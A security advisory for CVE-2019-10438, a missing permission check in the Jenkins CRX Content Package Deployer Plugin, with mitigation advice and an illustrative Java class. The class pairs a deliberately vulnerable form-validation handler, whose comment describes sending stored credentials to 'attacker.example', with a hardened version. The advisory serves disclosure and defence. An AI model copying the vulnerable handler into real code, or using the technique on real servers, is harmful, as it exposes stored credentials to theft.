PT-2019-11832 · Jenkins · Jenkins CRX Content Package Deployer Plugin

Oleg Nenashev · Published 2019-10-16 · Updated 2023-10-25 · CVE-2019-10438

CVSS v3.1: 6.5 Medium
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions
Jenkins CRX Content Package Deployer Plugin versions 1.8.1 and earlier (every release prior to 1.9 is affected; 1.9 is the fixed version).
Description
A missing permission check in the Jenkins CRX Content Package Deployer Plugin allows attackers with Overall/Read permission to make Jenkins connect to an attacker-specified URL and authenticate to it with credentials selected by an attacker-specified credentials ID (obtained through another method, since the ID itself is not enumerable through this flaw). The server at that URL receives the stored secret, so the attacker captures credentials stored in Jenkins. Overall/Read is the lowest permission Jenkins grants and is typically held by every authenticated user, and by anonymous users where anonymous read access is enabled, which is why the CVSS vector records only low privileges (PR:L) with a high confidentiality impact (C:H) and no integrity or availability impact.
Recommendations
Update the plugin to version 1.9 or later; this applies to every affected release (1.8.1 and earlier). Until the update is applied, treat every user holding Overall/Read as able to trigger the vulnerable connection: ensure anonymous users do not have Overall/Read, restrict access to the plugin's configuration pages to trusted users, and review which credential IDs are exposed in job configurations, build logs or other places a low-privileged user can read. If the plugin was exposed to untrusted Overall/Read users while vulnerable, rotate the credentials those users could have targeted, since a capture leaves no trace in the plugin itself.
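The weakness class described above, shown as an added illustration in Java. This is not the plugin's actual code, and every name in it (the class ConnectionCheck, the two doTestConnection methods, the lookup and probe helpers) is hypothetical; it uses only public Jenkins core, Stapler and Credentials Plugin APIs. The vulnerable method is the typical Stapler form-validation handler that resolves a caller-supplied credentials ID as SYSTEM and sends the secret to a caller-supplied URL with no permission check; the hardened method is the same handler with the checks Jenkins plugin guidelines require.

```java
package example; // hypothetical package, not the plugin's own code

import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Collections;

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import hudson.model.Item;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

public class ConnectionCheck {

    // Resolve a credentials ID to the stored username/password. The lookup runs as
    // SYSTEM, so it ignores who is asking: that is exactly why the handler calling
    // it must first prove the caller is allowed to use that credentials ID.
    private static StandardUsernamePasswordCredentials lookup(String credentialsId) {
        return CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        StandardUsernamePasswordCredentials.class,
                        Jenkins.get(), ACL.SYSTEM, Collections.emptyList()),
                CredentialsMatchers.withId(credentialsId));
    }

    // Send one HTTP Basic request to the given URL and turn the status into a
    // form-validation result. The Authorization header is where the secret leaves
    // Jenkins; whoever controls the URL receives it.
    private static FormValidation probe(String url, StandardUsernamePasswordCredentials c)
            throws IOException {
        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
        String userPass = c.getUsername() + ":" + c.getPassword().getPlainText();
        String basic = Base64.getEncoder()
                .encodeToString(userPass.getBytes(StandardCharsets.UTF_8));
        conn.setRequestProperty("Authorization", "Basic " + basic);
        int code = conn.getResponseCode();
        return code < 400 ? FormValidation.ok("Connected (HTTP " + code + ")")
                          : FormValidation.error("Server answered HTTP " + code);
    }

    // VULNERABLE pattern (illustrative): Stapler exposes this as a web method to any
    // user who can reach Jenkins at all, i.e. anyone with Overall/Read. Such a user
    // passes url=https://attacker.example/ plus a credentials ID learned elsewhere,
    // and Jenkins authenticates to the attacker's server with the stored secret.
    public FormValidation doTestConnectionVulnerable(@QueryParameter String url,
                                                     @QueryParameter String credentialsId)
            throws IOException {
        StandardUsernamePasswordCredentials c = lookup(credentialsId);
        if (c == null) return FormValidation.error("Unknown credentials ID");
        return probe(url, c);
    }

    // HARDENED pattern: a permission check that ties credential use to the right to
    // configure the item (or Jenkins itself, in the global configuration context), and
    // @RequirePOST, which Jenkins guidelines require for any form-validation method
    // with side effects such as an outbound connection. checkPermission throws an
    // AccessDeniedException, so a low-privileged caller never reaches the lookup.
    @RequirePOST
    public FormValidation doTestConnection(@AncestorInPath Item item,
                                           @QueryParameter String url,
                                           @QueryParameter String credentialsId)
            throws IOException {
        if (item == null) {
            Jenkins.get().checkPermission(Jenkins.ADMINISTER); // global config page
        } else {
            item.checkPermission(Item.CONFIGURE);              // job/folder config page
        }
        StandardUsernamePasswordCredentials c = lookup(credentialsId);
        if (c == null) return FormValidation.error("Unknown credentials ID");
        return probe(url, c);
    }
}
```

The difference between the two handlers is the whole advisory: the network call and the SYSTEM-level credential lookup are the same, only the hardened version refuses to perform them for a caller who could not otherwise configure the item and so could not legitimately use the credential. When auditing a plugin for this class of bug, look for every public method named do* that takes a credentialsId and a URL or host, and confirm that a checkPermission (or an equivalent hasPermission early return) runs before the lookup.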

Fix

Fixed in Jenkins CRX Content Package Deployer Plugin version 1.9.

Weakness Enumeration

Missing Authorization (CWE-862)
Improper Authorization (CWE-285)

Related Identifiers

CVE-2019-10438
GHSA-JWW4-2793-9GMG

Affected Products

Jenkins
Jenkins CRX Content Package Deployer Plugin